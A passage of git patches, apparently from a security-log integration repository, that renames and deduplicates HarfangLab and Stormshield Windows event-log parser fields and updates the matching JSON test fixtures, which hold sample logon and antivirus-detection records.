+          action.properties.CategoryName: "{{json_event.message.event_data.get('Category Name')}}"
+          action.properties.ClientProcessId: "{{json_event.message.event_data.get('ClientProcessId')}}"
+          action.properties.ClientProcessStartKey: "{{json_event.message.event_data.get('ClientProcessStartKey')}}"
+          action.properties.DetectionID: "{{json_event.message.event_data.get('Detection ID')}}"
+          action.properties.DetectionTime: "{{json_event.message.event_data.get('Detection Time')}}"
+          action.properties.DetectionUser: "{{json_event.message.event_data.get('Detection User')}}"
+          action.properties.ElevatedToken: "{{json_event.message.event_data.get('ElevatedToken')}}"
+          action.properties.EngineVersion: "{{json_event.message.event_data.get('Engine Version')}}"
+          action.properties.Engineup-to-date: "{{json_event.message.event_data.get('Engine up-to-date')}}"
+          action.properties.Engineversion: "{{json_event.message.event_data.get('Engine version')}}"
+          action.properties.ErrorCode: "{{json_event.message.event_data.get('Error Code')}}"
+          action.properties.ErrorDescription: "{{json_event.message.event_data.get('Error Description')}}"
+          action.properties.ExecutionID: "{{json_event.message.event_data.get('Execution ID')}}"
+          action.properties.ExecutionName: "{{json_event.message.event_data.get('Execution Name')}}"
+          action.properties.FQDN: "{{json_event.message.event_data.get('FQDN')}}"
+          action.properties.FWLink: "{{json_event.message.event_data.get('FWLink')}}"
+          action.properties.FailureReason: "{{json_event.message.event_data.get('FailureReason')}}"
+          action.properties.FileNameBuffer: "{{json_event.message.event_data.get('FileNameBuffer')}}"
+          action.properties.FileNameLength: "{{json_event.message.event_data.get('FileNameLength')}}"
+          action.properties.Flags: "{{json_event.message.event_data.get('Flags')}}"
+          action.properties.Hash: "{{json_event.message.event_data.get('Hash')}}"
+          action.properties.HashSize: "{{json_event.message.event_data.get('Hash Size')}}"
+          action.properties.IOAVstate: "{{json_event.message.event_data.get('IOAV state')}}"
+          action.properties.ImpersonationLevel: "{{json_event.message.event_data.get('ImpersonationLevel')}}"
+          action.properties.IpAddress: "{{json_event.message.event_data.get('IpAddress')}}"
+          action.properties.IpPort: "{{json_event.message.event_data.get('IpPort')}}"
+          action.properties.IssuerName: "{{json_event.message.event_data.get('IssuerName')}}"
+          action.properties.IssuerNameLength: "{{json_event.message.event_data.get('IssuerNameLength')}}"
+          action.properties.IssuerTBSHash: "{{json_event.message.event_data.get('IssuerTBSHash')}}"
+          action.properties.IssuerTBSHashSize: "{{json_event.message.event_data.get('IssuerTBSHashSize')}}"
+          action.properties.KeyLength: "{{json_event.message.event_data.get('KeyLength')}}"
+          action.properties.LastASsecurityintelligenceage: "{{json_event.message.event_data.get('Last AS security intelligence age')}}"
+          action.properties.LastAVsecurityintelligenceage: "{{json_event.message.event_data.get('Last AV security intelligence age')}}"
+          action.properties.Lastfullscanage: "{{json_event.message.event_data.get('Last full scan age')}}"
+          action.properties.Lastfullscanendtime: "{{json_event.message.event_data.get('Last full scan end time')}}"
+          action.properties.Lastfullscansource: "{{json_event.message.event_data.get('Last full scan source')}}"
+          action.properties.Lastfullscanstarttime: "{{json_event.message.event_data.get('Last full scan start time')}}"
+          action.properties.Lastquickscanage: "{{json_event.message.event_data.get('Last quick scan age')}}"
+          action.properties.Lastquickscanendtime: "{{json_event.message.event_data.get('Last quick scan end time')}}"
+          action.properties.Lastquickscansource: "{{json_event.message.event_data.get('Last quick scan source')}}"
+          action.properties.Lastquickscanstarttime: "{{json_event.message.event_data.get('Last quick scan start time')}}"
+          action.properties.Latestengineversion: "{{json_event.message.event_data.get('Latest engine version')}}"
+          action.properties.Latestplatformversion: "{{json_event.message.event_data.get('Latest platform version')}}"
+          action.properties.LmPackageName: "{{json_event.message.event_data.get('LmPackageName')}}"
+          action.properties.LogonGuid: "{{json_event.message.event_data.get('LogonGuid')}}"
+          action.properties.LogonProcessName: "{{json_event.message.event_data.get('LogonProcessName')}}"
+          action.properties.LogonType: "{{json_event.message.event_data.get('LogonType')}}"
+          action.properties.NRIengineversion: "{{json_event.message.event_data.get('NRI engine version')}}"
+          action.properties.NRIsecurityintelligenceversion: "{{json_event.message.event_data.get('NRI security intelligence version')}}"
+          action.properties.NotValidAfter: "{{json_event.message.event_data.get('NotValidAfter')}}"
+          action.properties.NotValidBefore: "{{json_event.message.event_data.get('NotValidBefore')}}"
+          action.properties.OAstate: "{{json_event.message.event_data.get('OA state')}}"
+          action.properties.ObjectType: "{{json_event.message.event_data.get('ObjectType')}}"
+          action.properties.OriginID: "{{json_event.message.event_data.get('Origin ID')}}"
+          action.properties.OriginName: "{{json_event.message.event_data.get('Origin Name')}}"
+          action.properties.PageHash: "{{json_event.message.event_data.get('PageHash')}}"
+          action.properties.ParentProcessId: "{{json_event.message.event_data.get('ParentProcessId')}}"
+          action.properties.Path: "{{json_event.message.event_data.get('Path')}}"
+          action.properties.Platformup-to-date: "{{json_event.message.event_data.get('Platform up-to-date')}}"
+          action.properties.Platformversion: "{{json_event.message.event_data.get('Platform version')}}"
+          action.properties.PolicyBits: "{{json_event.message.event_data.get('PolicyBits')}}"
+          action.properties.PostCleanStatus: "{{json_event.message.event_data.get('Post Clean Status')}}"
+          action.properties.PreExecutionStatus: "{{json_event.message.event_data.get('Pre Execution Status')}}"
+          action.properties.ProcessName: "{{json_event.message.event_data.get('Process Name')}}"
+          action.properties.ProcessId: "{{json_event.message.event_data.get('ProcessId')}}"
+          action.properties.ProcessName: "{{json_event.message.event_data.get('ProcessName')}}"
+          action.properties.ProcessNameBuffer: "{{json_event.message.event_data.get('ProcessNameBuffer')}}"
+          action.properties.ProcessNameLength: "{{json_event.message.event_data.get('ProcessNameLength')}}"
+          action.properties.ProductName: "{{json_event.message.event_data.get('Product Name')}}"
+          action.properties.ProductVersion: "{{json_event.message.event_data.get('Product Version')}}"
+          action.properties.Productstatus: "{{json_event.message.event_data.get('Product status')}}"
+          action.properties.ProfileChanged: "{{json_event.message.event_data.get('ProfileChanged')}}"
+          action.properties.PublisherName: "{{json_event.message.event_data.get('PublisherName')}}"
+          action.properties.PublisherNameLength: "{{json_event.message.event_data.get('PublisherNameLength')}}"
+          action.properties.PublisherTBSHash: "{{json_event.message.event_data.get('PublisherTBSHash')}}"
+          action.properties.PublisherTBSHashSize: "{{json_event.message.event_data.get('PublisherTBSHashSize')}}"
+          action.properties.RTPstate: "{{json_event.message.event_data.get('RTP state')}}"
+          action.properties.RelativeTargetName: "{{json_event.message.event_data.get('RelativeTargetName')}}"
+          action.properties.RemediationUser: "{{json_event.message.event_data.get('Remediation User')}}"
+          action.properties.RequestedPolicy: "{{json_event.message.event_data.get('RequestedPolicy')}}"
+          action.properties.RequestedSigningLevel: "{{json_event.message.event_data.get('RequestedSigningLevel')}}"
+          action.properties.RestrictedAdminMode: "{{json_event.message.event_data.get('RestrictedAdminMode')}}"
+          action.properties.RpcCallClientLocality: "{{json_event.message.event_data.get('RpcCallClientLocality')}}"
+          action.properties.RuleId: "{{json_event.message.event_data.get('RuleId')}}"
+          action.properties.RuleName: "{{json_event.message.event_data.get('RuleName')}}"
+          action.properties.ScriptBlockText: "{{json_event.message.event_data.get('ScriptBlockText')}}"
+          action.properties.SecureRequired: "{{json_event.message.event_data.get('SecureRequired')}}"
+          action.properties.SecurityintelligenceVersion: "{{json_event.message.event_data.get('Security intelligence Version')}}"
+          action.properties.SeverityID: "{{json_event.message.event_data.get('Severity ID')}}"
+          action.properties.SeverityName: "{{json_event.message.event_data.get('Severity Name')}}"
+          action.properties.ShareLocalPath: "{{json_event.message.event_data.get('ShareLocalPath')}}"
+          action.properties.ShareName: "{{json_event.message.event_data.get('ShareName')}}"
+          action.properties.Signature: "{{json_event.message.event_data.get('Signature')}}"
+          action.properties.SignatureType: "{{json_event.message.event_data.get('SignatureType')}}"
+          action.properties.SourceID: "{{json_event.message.event_data.get('Source ID')}}"
+          action.properties.SourceName: "{{json_event.message.event_data.get('Source Name')}}"
+          action.properties.State: "{{json_event.message.event_data.get('State')}}"
+          action.properties.Status: "{{json_event.message.event_data.get('Status')}}"
+          action.properties.StatusCode: "{{json_event.message.event_data.get('Status Code')}}"
+          action.properties.StatusDescription: "{{json_event.message.event_data.get('Status Description')}}"
+          action.properties.SubStatus: "{{json_event.message.event_data.get('SubStatus')}}"
+          action.properties.SubjectDomainName: "{{json_event.message.event_data.get('SubjectDomainName')}}"
+          action.properties.SubjectLogonId: "{{json_event.message.event_data.get('SubjectLogonId')}}"
+          action.properties.SubjectUserName: "{{json_event.message.event_data.get('SubjectUserName')}}"
+          action.properties.SubjectUserSid: "{{json_event.message.event_data.get('SubjectUserSid')}}"
+          action.properties.TargetDomainName: "{{json_event.message.event_data.get('TargetDomainName')}}"
+          action.properties.TargetInfo: "{{json_event.message.event_data.get('TargetInfo')}}"
+          action.properties.TargetLinkedLogonId: "{{json_event.message.event_data.get('TargetLinkedLogonId')}}"
+          action.properties.TargetLogonGuid: "{{json_event.message.event_data.get('TargetLogonGuid')}}"
+          action.properties.TargetLogonId: "{{json_event.message.event_data.get('TargetLogonId')}}"
+          action.properties.TargetOutboundDomainName: "{{json_event.message.event_data.get('TargetOutboundDomainName')}}"
+          action.properties.TargetOutboundUserName: "{{json_event.message.event_data.get('TargetOutboundUserName')}}"
+          action.properties.TargetServerName: "{{json_event.message.event_data.get('TargetServerName')}}"
+          action.properties.TargetSid: "{{json_event.message.event_data.get('TargetSid')}}"
+          action.properties.TargetUserName: "{{json_event.message.event_data.get('TargetUserName')}}"
+          action.properties.TargetUserSid: "{{json_event.message.event_data.get('TargetUserSid')}}"
+          action.properties.TaskContent: "{{json_event.message.event_data.get('TaskContent')}}"
+          action.properties.TaskContentNew_Args: "{{json_event.message.event_data.get('TaskContentNew_Args')}}"
+          action.properties.TaskContentNew_Command: "{{json_event.message.event_data.get('TaskContentNew_Command')}}"
+          action.properties.TaskName: "{{json_event.message.event_data.get('TaskName')}}"
+          action.properties.ThreatID: "{{json_event.message.event_data.get('Threat ID')}}"
+          action.properties.ThreatName: "{{json_event.message.event_data.get('Threat Name')}}"
+          action.properties.TotalSignatureCount: "{{json_event.message.event_data.get('TotalSignatureCount')}}"
+          action.properties.TransmittedServices: "{{json_event.message.event_data.get('TransmittedServices')}}"
+          action.properties.TypeID: "{{json_event.message.event_data.get('Type ID')}}"
+          action.properties.TypeName: "{{json_event.message.event_data.get('Type Name')}}"
+          action.properties.Unused: "{{json_event.message.event_data.get('Unused')}}"
+          action.properties.Unused2: "{{json_event.message.event_data.get('Unused2')}}"
+          action.properties.Unused3: "{{json_event.message.event_data.get('Unused3')}}"
+          action.properties.Unused4: "{{json_event.message.event_data.get('Unused4')}}"
+          action.properties.Unused5: "{{json_event.message.event_data.get('Unused5')}}"
+          action.properties.Unused6: "{{json_event.message.event_data.get('Unused6')}}"
+          action.properties.ValidatedPolicy: "{{json_event.message.event_data.get('ValidatedPolicy')}}"
+          action.properties.ValidatedSigningLevel: "{{json_event.message.event_data.get('ValidatedSigningLevel')}}"
+          action.properties.VerificationError: "{{json_event.message.event_data.get('VerificationError')}}"
+          action.properties.VirtualAccount: "{{json_event.message.event_data.get('VirtualAccount')}}"
+          action.properties.WorkstationName: "{{json_event.message.event_data.get('WorkstationName')}}"
+          action.properties.param0: "{{json_event.message.event_data.get('param0')}}"
+          action.properties.param1: "{{json_event.message.event_data.get('param1')}}"
+          action.properties.param10: "{{json_event.message.event_data.get('param10')}}"
+          action.properties.param11: "{{json_event.message.event_data.get('param11')}}"
+          action.properties.param12: "{{json_event.message.event_data.get('param12')}}"
+          action.properties.param13: "{{json_event.message.event_data.get('param13')}}"
+          action.properties.param14: "{{json_event.message.event_data.get('param14')}}"
+          action.properties.param15: "{{json_event.message.event_data.get('param15')}}"
+          action.properties.param16: "{{json_event.message.event_data.get('param16')}}"
+          action.properties.param17: "{{json_event.message.event_data.get('param17')}}"
+          action.properties.param18: "{{json_event.message.event_data.get('param18')}}"
+          action.properties.param19: "{{json_event.message.event_data.get('param19')}}"
+          action.properties.param2: "{{json_event.message.event_data.get('param2')}}"
+          action.properties.param20: "{{json_event.message.event_data.get('param20')}}"
+          action.properties.param21: "{{json_event.message.event_data.get('param21')}}"
+          action.properties.param22: "{{json_event.message.event_data.get('param22')}}"
+          action.properties.param3: "{{json_event.message.event_data.get('param3')}}"
+          action.properties.param4: "{{json_event.message.event_data.get('param4')}}"
+          action.properties.param5: "{{json_event.message.event_data.get('param5')}}"
+          action.properties.param6: "{{json_event.message.event_data.get('param6')}}"
+          action.properties.param7: "{{json_event.message.event_data.get('param7')}}"
+          action.properties.param8: "{{json_event.message.event_data.get('param8')}}"
+          action.properties.param9: "{{json_event.message.event_data.get('param9')}}"
           action.properties.TaskContentNew_Command: "{{parse_task_info.message.Task.Actions.Exec.Command}}"
           action.properties.TaskContentNew_Args: "{{parse_task_info.message.Task.Actions.Exec.Arguments}}"
 
diff --git a/HarfangLab/harfanglab/tests/test_bug.json b/HarfangLab/harfanglab/tests/test_bug.json
index 51d847ee4..8c13cc324 100644
--- a/HarfangLab/harfanglab/tests/test_bug.json
+++ b/HarfangLab/harfanglab/tests/test_bug.json
@@ -16,7 +16,6 @@
     "action": {
       "id": 1001,
       "properties": {
-        "param0": "",
         "param1": "0",
         "param10": "0",
         "param11": "8024500b",
@@ -24,13 +23,10 @@
         "param13": "{581473F3-A4DC-4D00-8245-D203EAA9B5A9}",
         "param14": "0",
         "param15": "C:\\Windows\\WindowsUpdate.log\r\nC:\\Windows\\SoftwareDistribution\\ReportingEvents.log",
-        "param16": "",
-        "param17": "",
         "param18": "0",
         "param19": "3e7b694e-4cf1-45cc-93ff-f30da6e8f683",
         "param2": "WindowsUpdateFailure3",
         "param20": "262144",
-        "param21": "",
         "param3": "Non disponible",
         "param4": "0",
         "param5": "7.9.9600.19915",
diff --git a/HarfangLab/harfanglab/tests/wineeventlog-event.json b/HarfangLab/harfanglab/tests/wineeventlog-event.json
index 0468dab02..e1f2d3f70 100644
--- a/HarfangLab/harfanglab/tests/wineeventlog-event.json
+++ b/HarfangLab/harfanglab/tests/wineeventlog-event.json
@@ -28,27 +28,18 @@
         "IpAddress": "1.2.3.4",
         "IpPort": "17780",
         "KeyLength": "0",
-        "LmPackageName": "-",
         "LogonGuid": "{7B5ACC17-5CED-4A2D-ABCB-BECAE6799395}",
         "LogonProcessName": "Kerbe",
         "LogonType": "3",
         "ProcessId": "0x0",
-        "ProcessName": "-",
-        "RestrictedAdminMode": "-",
-        "SubjectDomainName": "-",
         "SubjectLogonId": "0x0",
-        "SubjectUserName": "-",
         "SubjectUserSid": "S-1-0-0",
         "TargetDomainName": "example.org",
         "TargetLinkedLogonId": "0x0",
         "TargetLogonId": "0x6accabcc3",
-        "TargetOutboundDomainName": "-",
-        "TargetOutboundUserName": "-",
         "TargetUserName": "john.doe$",
         "TargetUserSid": "S-1-5-21-11111111111-111111111111-11111111-111",
-        "TransmittedServices": "-",
-        "VirtualAccount": "%%1843",
-        "WorkstationName": "-"
+        "VirtualAccount": "%%1843"
       }
     },
     "agent": {
diff --git a/HarfangLab/harfanglab/tests/wineventlog2.json b/HarfangLab/harfanglab/tests/wineventlog2.json
index ca3f92c17..1d0131cbf 100644
--- a/HarfangLab/harfanglab/tests/wineventlog2.json
+++ b/HarfangLab/harfanglab/tests/wineventlog2.json
@@ -27,22 +27,15 @@
         "IpAddress": "166.88.151.58",
         "IpPort": "0",
         "KeyLength": "0",
-        "LmPackageName": "-",
         "LogonProcessName": "NtLmSsp ",
         "LogonType": "3",
         "ProcessId": "0x0",
-        "ProcessName": "-",
         "Status": "0xc000006d",
         "SubStatus": "0xc000006a",
-        "SubjectDomainName": "-",
         "SubjectLogonId": "0x0",
-        "SubjectUserName": "-",
         "SubjectUserSid": "S-1-0-0",
-        "TargetDomainName": null,
         "TargetUserName": "ADMINISTRATOR",
-        "TargetUserSid": "S-1-0-0",
-        "TransmittedServices": "-",
-        "WorkstationName": "-"
+        "TargetUserSid": "S-1-0-0"
       }
     },
     "agent": {
diff --git a/HarfangLab/harfanglab/tests/wineventlog3.json b/HarfangLab/harfanglab/tests/wineventlog3.json
index 5f8ce7a01..5af94e187 100644
--- a/HarfangLab/harfanglab/tests/wineventlog3.json
+++ b/HarfangLab/harfanglab/tests/wineventlog3.json
@@ -16,48 +16,39 @@
     "action": {
       "id": 1116,
       "properties": {
-        "Action ID": "9",
-        "Action Name": "Non applicable",
-        "Additional Actions ID": "0",
-        "Additional Actions String": "No additional actions required",
-        "Category ID": "30",
-        "Category Name": "Attaque",
-        "Detection ID": "{2E51DC7F-A01D-4E9E-94C8-782C63D85C6E}",
-        "Detection Time": "2022-01-03T05:44:57.284Z",
-        "Detection User": "AUTORITE NT\\Syst\u00e8me",
-        "Engine Version": "AM: 1.1.18800.4, NIS: 1.1.18800.4",
-        "Error Code": "0x00000000",
-        "Error Description": "L\u2019op\u00e9ration a r\u00e9ussi. ",
-        "Execution ID": "1",
-        "Execution Name": "Suspendu",
+        "ActionID": "9",
+        "ActionName": "Non applicable",
+        "AdditionalActionsID": "0",
+        "AdditionalActionsString": "No additional actions required",
+        "CategoryID": "30",
+        "CategoryName": "Attaque",
+        "DetectionID": "{2E51DC7F-A01D-4E9E-94C8-782C63D85C6E}",
+        "DetectionTime": "2022-01-03T05:44:57.284Z",
+        "DetectionUser": "AUTORITE NT\\Syst\u00e8me",
+        "EngineVersion": "AM: 1.1.18800.4, NIS: 1.1.18800.4",
+        "ErrorCode": "0x00000000",
+        "ErrorDescription": "L\u2019op\u00e9ration a r\u00e9ussi. ",
+        "ExecutionID": "1",
+        "ExecutionName": "Suspendu",
         "FWLink": "https://go.microsoft.com/fwlink/?linkid=37020&name=Exploit:O97M/CVE-2017-11882.SMK!MTB&threatid=2147772194&enterprise=0",
-        "Origin ID": "1",
-        "Origin Name": "Ordinateur local",
+        "OriginID": "1",
+        "OriginName": "Ordinateur local",
         "Path": "file:_C:\\Program Files\\Avast\\Amex\\temp\\TMMSG_45AD4A29-D7BD-AE8F-FFBC-4115652291C2",
-        "Post Clean Status": "0",
-        "Pre Execution Status": "0",
-        "Process Name": "C:\\Program Files\\Avast\\Amex\\AMEX_secondary.exe",
-        "Product Name": "Antivirus Microsoft Defender",
-        "Product Version": "4.18.2111.5",
-        "Remediation User": null,
-        "Security intelligence Version": "AV: 1.355.1292.0, AS: 1.355.1292.0, NIS: 1.355.1292.0",
-        "Severity ID": "5",
-        "Severity Name": "Grave",
-        "Source ID": "3",
-        "Source Name": "Protection en temps r\u00e9el",
+        "PostCleanStatus": "0",
+        "PreExecutionStatus": "0",
+        "ProductName": "Antivirus Microsoft Defender",
+        "ProductVersion": "4.18.2111.5",
+        "SecurityintelligenceVersion": "AV: 1.355.1292.0, AS: 1.355.1292.0, NIS: 1.355.1292.0",
+        "SeverityID": "5",
+        "SeverityName": "Grave",
+        "SourceID": "3",
+        "SourceName": "Protection en temps r\u00e9el",
         "State": "1",
-        "Status Code": "1",
-        "Status Description": null,
-        "Threat ID": "2147772194",
-        "Threat Name": "Exploit:O97M/CVE-2017-11882.SMK",
-        "Type ID": "0",
-        "Type Name": "Concret",
-        "Unused": null,
-        "Unused2": null,
-        "Unused3": null,
-        "Unused4": null,
-        "Unused5": null,
-        "Unused6": null
+        "StatusCode": "1",
+        "ThreatID": "2147772194",
+        "ThreatName": "Exploit:O97M/CVE-2017-11882.SMK",
+        "TypeID": "0",
+        "TypeName": "Concret"
       }
     },
     "agent": {
diff --git a/HarfangLab/harfanglab/tests/wineventlog4.json b/HarfangLab/harfanglab/tests/wineventlog4.json
index 7e3ab3450..c8aff9945 100644
--- a/HarfangLab/harfanglab/tests/wineventlog4.json
+++ b/HarfangLab/harfanglab/tests/wineventlog4.json
@@ -18,12 +18,10 @@
       "properties": {
         "AccessList": "%%1538\n\t\t\t\t%%1541\n\t\t\t\t%%4416\n\t\t\t\t%%4417\n\t\t\t\t%%4418\n\t\t\t\t%%4419\n\t\t\t\t%%4420\n\t\t\t\t%%4423\n\t\t\t\t%%4424\n\t\t\t\t",
         "AccessMask": "0x12019f",
-        "AccessReason": "-",
         "IpAddress": "10.84.128.186",
         "IpPort": "50846",
         "ObjectType": "File",
         "RelativeTargetName": "NETLOGON",
-        "ShareLocalPath": null,
         "ShareName": "\\\\*\\IPC$",
         "SubjectDomainName": "AUTORITE NT",
         "SubjectLogonId": "0x3ad88f7f3",

From 18315760a88331377df466e61002299344057145 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 18 Sep 2024 16:02:27 +0200
Subject: [PATCH 056/317] fix(Harfanglab): fix duplicated fields

---
 HarfangLab/harfanglab/ingest/parser.yml       | 5 +----
 HarfangLab/harfanglab/tests/wineventlog3.json | 1 +
 2 files changed, 2 insertions(+), 4 deletions(-)

diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index 1ae78875b..8a357b33f 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -354,9 +354,8 @@ stages:
           action.properties.PolicyBits: "{{json_event.message.event_data.get('PolicyBits')}}"
           action.properties.PostCleanStatus: "{{json_event.message.event_data.get('Post Clean Status')}}"
           action.properties.PreExecutionStatus: "{{json_event.message.event_data.get('Pre Execution Status')}}"
-          action.properties.ProcessName: "{{json_event.message.event_data.get('Process Name')}}"
+          action.properties.ProcessName: "{{json_event.message.event_data.get('Process Name') or json_event.message.event_data.get('ProcessName')}}"
           action.properties.ProcessId: "{{json_event.message.event_data.get('ProcessId')}}"
-          action.properties.ProcessName: "{{json_event.message.event_data.get('ProcessName')}}"
           action.properties.ProcessNameBuffer: "{{json_event.message.event_data.get('ProcessNameBuffer')}}"
           action.properties.ProcessNameLength: "{{json_event.message.event_data.get('ProcessNameLength')}}"
           action.properties.ProductName: "{{json_event.message.event_data.get('Product Name')}}"
@@ -408,8 +407,6 @@ stages:
           action.properties.TargetUserName: "{{json_event.message.event_data.get('TargetUserName')}}"
           action.properties.TargetUserSid: "{{json_event.message.event_data.get('TargetUserSid')}}"
           action.properties.TaskContent: "{{json_event.message.event_data.get('TaskContent')}}"
-          action.properties.TaskContentNew_Args: "{{json_event.message.event_data.get('TaskContentNew_Args')}}"
-          action.properties.TaskContentNew_Command: "{{json_event.message.event_data.get('TaskContentNew_Command')}}"
           action.properties.TaskName: "{{json_event.message.event_data.get('TaskName')}}"
           action.properties.ThreatID: "{{json_event.message.event_data.get('Threat ID')}}"
           action.properties.ThreatName: "{{json_event.message.event_data.get('Threat Name')}}"
diff --git a/HarfangLab/harfanglab/tests/wineventlog3.json b/HarfangLab/harfanglab/tests/wineventlog3.json
index 5af94e187..d8e4d1004 100644
--- a/HarfangLab/harfanglab/tests/wineventlog3.json
+++ b/HarfangLab/harfanglab/tests/wineventlog3.json
@@ -36,6 +36,7 @@
         "Path": "file:_C:\\Program Files\\Avast\\Amex\\temp\\TMMSG_45AD4A29-D7BD-AE8F-FFBC-4115652291C2",
         "PostCleanStatus": "0",
         "PreExecutionStatus": "0",
+        "ProcessName": "C:\\Program Files\\Avast\\Amex\\AMEX_secondary.exe",
         "ProductName": "Antivirus Microsoft Defender",
         "ProductVersion": "4.18.2111.5",
         "SecurityintelligenceVersion": "AV: 1.355.1292.0, AS: 1.355.1292.0, NIS: 1.355.1292.0",

From fb5701bfa7f9fd878e63f99b6195fcdc5a9dca20 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 18 Sep 2024 18:35:03 +0200
Subject: [PATCH 057/317] fix(Stormshield): convert to camelcase the name of
 action.properties fields

---
 .../_meta/fields.yml                          | 168 +++++++++---------
 .../ingest/parser.yml                         |  74 ++++----
 .../tests/test_type_20048_1.json              |  72 ++++----
 3 files changed, 157 insertions(+), 157 deletions(-)

diff --git a/Stormshield/stormshield-endpoint-security/_meta/fields.yml b/Stormshield/stormshield-endpoint-security/_meta/fields.yml
index e57a1d3d1..efff7013c 100644
--- a/Stormshield/stormshield-endpoint-security/_meta/fields.yml
+++ b/Stormshield/stormshield-endpoint-security/_meta/fields.yml
@@ -3,199 +3,199 @@ action.id:
   name: action.id
   type: keyword
 
-action.properties.TargetCommandLine:
-  description: stormshield targeted process command line
-  name: action.properties.TargetCommandLine
-  type: keyword
-
-action.properties.TargetImage:
-  description: stormshield targeted process executable
-  name: action.properties.TargetImage
-  type: keyword
-
-action.properties.action_id:
+action.properties.ActionId:
   description: stormshield property Action ID
-  name: action.properties.action_id
+  name: action.properties.ActionId
   type: keyword
 
-action.properties.action_name:
+action.properties.ActionName:
   description: stormshield property Action Name
-  name: action.properties.action_name
+  name: action.properties.ActionName
   type: keyword
 
-action.properties.additional_actions_id:
+action.properties.AdditionalActionsId:
   description: stormshield property Additional Actions ID
-  name: action.properties.additional_actions_id
+  name: action.properties.AdditionalActionsId
   type: keyword
 
-action.properties.additional_actions_string:
+action.properties.AdditionalActionsString:
   description: stormshield property Additional Actions String
-  name: action.properties.additional_actions_string
+  name: action.properties.AdditionalActionsString
   type: keyword
 
-action.properties.category_id:
+action.properties.CategoryId:
   description: stormshield property Category ID
-  name: action.properties.category_id
+  name: action.properties.CategoryId
   type: keyword
 
-action.properties.category_name:
+action.properties.CategoryName:
   description: stormshield property Category Name
-  name: action.properties.category_name
+  name: action.properties.CategoryName
   type: keyword
 
-action.properties.detection_id:
+action.properties.DetectionId:
   description: stormshield property Detection ID
-  name: action.properties.detection_id
+  name: action.properties.DetectionId
   type: keyword
 
-action.properties.detection_time:
+action.properties.DetectionTime:
   description: stormshield property Detection Time
-  name: action.properties.detection_time
+  name: action.properties.DetectionTime
   type: keyword
 
-action.properties.detection_user:
+action.properties.DetectionUser:
   description: stormshield property Detection User
-  name: action.properties.detection_user
+  name: action.properties.DetectionUser
   type: keyword
 
-action.properties.engine_version:
+action.properties.EngineVersion:
   description: stormshield property Engine Version
-  name: action.properties.engine_version
+  name: action.properties.EngineVersion
   type: keyword
 
-action.properties.error_code:
+action.properties.ErrorCode:
   description: stormshield property Error Code
-  name: action.properties.error_code
+  name: action.properties.ErrorCode
   type: keyword
 
-action.properties.error_description:
+action.properties.ErrorDescription:
   description: stormshield property Error Description
-  name: action.properties.error_description
+  name: action.properties.ErrorDescription
   type: keyword
 
-action.properties.execution_id:
+action.properties.ExecutionId:
   description: stormshield property Execution ID
-  name: action.properties.execution_id
+  name: action.properties.ExecutionId
   type: keyword
 
-action.properties.execution_name:
+action.properties.ExecutionName:
   description: stormshield property Execution Name
-  name: action.properties.execution_name
+  name: action.properties.ExecutionName
   type: keyword
 
-action.properties.fwlink:
+action.properties.Fwlink:
   description: stormshield property FWLink
-  name: action.properties.fwlink
+  name: action.properties.Fwlink
   type: keyword
 
-action.properties.opcode:
+action.properties.Opcode:
   description: stormshield action opcode
-  name: action.properties.opcode
+  name: action.properties.Opcode
   type: keyword
 
-action.properties.origin_id:
+action.properties.OriginId:
   description: stormshield property Origin ID
-  name: action.properties.origin_id
+  name: action.properties.OriginId
   type: keyword
 
-action.properties.origin_name:
+action.properties.OriginName:
   description: stormshield property Origin Name
-  name: action.properties.origin_name
+  name: action.properties.OriginName
   type: keyword
 
-action.properties.path:
+action.properties.Path:
   description: stormshield property Path
-  name: action.properties.path
+  name: action.properties.Path
   type: keyword
 
-action.properties.post_clean_status:
+action.properties.PostCleanStatus:
   description: stormshield property Post Clean Status
-  name: action.properties.post_clean_status
+  name: action.properties.PostCleanStatus
   type: keyword
 
-action.properties.pre_execution_status:
+action.properties.PreExecutionStatus:
   description: stormshield property Pre Execution Status
-  name: action.properties.pre_execution_status
+  name: action.properties.PreExecutionStatus
   type: keyword
 
-action.properties.process_name:
+action.properties.ProcessName:
   description: stormshield property Process Name
-  name: action.properties.process_name
+  name: action.properties.ProcessName
   type: keyword
 
-action.properties.product_name:
+action.properties.ProductName:
   description: stormshield property Product Name
-  name: action.properties.product_name
+  name: action.properties.ProductName
   type: keyword
 
-action.properties.product_version:
+action.properties.ProductVersion:
   description: stormshield property Product Version
-  name: action.properties.product_version
+  name: action.properties.ProductVersion
   type: keyword
 
-action.properties.remediation_user:
+action.properties.RemediationUser:
   description: stormshield property Remediation User
-  name: action.properties.remediation_user
+  name: action.properties.RemediationUser
   type: keyword
 
-action.properties.security_intelligence_version:
+action.properties.SecurityIntelligenceVersion:
   description: stormshield property Security intelligence Version
-  name: action.properties.security_intelligence_version
+  name: action.properties.SecurityIntelligenceVersion
   type: keyword
 
-action.properties.severity_id:
+action.properties.SeverityId:
   description: stormshield property Severity ID
-  name: action.properties.severity_id
+  name: action.properties.SeverityId
   type: keyword
 
-action.properties.severity_name:
+action.properties.SeverityName:
   description: stormshield property Severity Name
-  name: action.properties.severity_name
+  name: action.properties.SeverityName
   type: keyword
 
-action.properties.source_id:
+action.properties.SourceId:
   description: stormshield property Source ID
-  name: action.properties.source_id
+  name: action.properties.SourceId
   type: keyword
 
-action.properties.source_name:
+action.properties.SourceName:
   description: stormshield property Source Name
-  name: action.properties.source_name
+  name: action.properties.SourceName
   type: keyword
 
-action.properties.state:
+action.properties.State:
   description: stormshield property State
-  name: action.properties.state
+  name: action.properties.State
   type: keyword
 
-action.properties.status_code:
+action.properties.StatusCode:
   description: stormshield property Status Code
-  name: action.properties.status_code
+  name: action.properties.StatusCode
+  type: keyword
+
+action.properties.TargetCommandLine:
+  description: stormshield targeted process command line
+  name: action.properties.TargetCommandLine
+  type: keyword
+
+action.properties.TargetImage:
+  description: stormshield targeted process executable
+  name: action.properties.TargetImage
   type: keyword
 
-action.properties.task:
+action.properties.Task:
   description: stormshield action task
-  name: action.properties.task
+  name: action.properties.Task
   type: keyword
 
-action.properties.threat_id:
+action.properties.ThreatId:
   description: stormshield property Threat ID
-  name: action.properties.threat_id
+  name: action.properties.ThreatId
